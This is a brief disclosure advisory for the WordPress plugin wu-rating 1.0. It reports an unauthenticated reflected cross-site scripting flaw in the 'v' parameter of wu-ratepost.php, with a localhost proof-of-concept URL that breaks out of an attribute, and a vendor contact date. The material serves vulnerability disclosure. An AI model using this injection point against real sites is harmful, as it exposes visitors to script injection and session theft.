wp-plugin : wu-rating – A3-Cross-Site Scripting (XSS)
Plugin Details
Plugin Name : wu-rating
Effected Version : 1.0 12319 (and most probably lower version's if any)
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/wu-rating/wu-ratepost.php?id=id&v=v”>
// & Vulnerable Parameter : v
Disclosure Timeline
Vendor Contacted : 2014-01-17
Plugin Description :
Wu-Rating can add a chosen in a post to rate the post,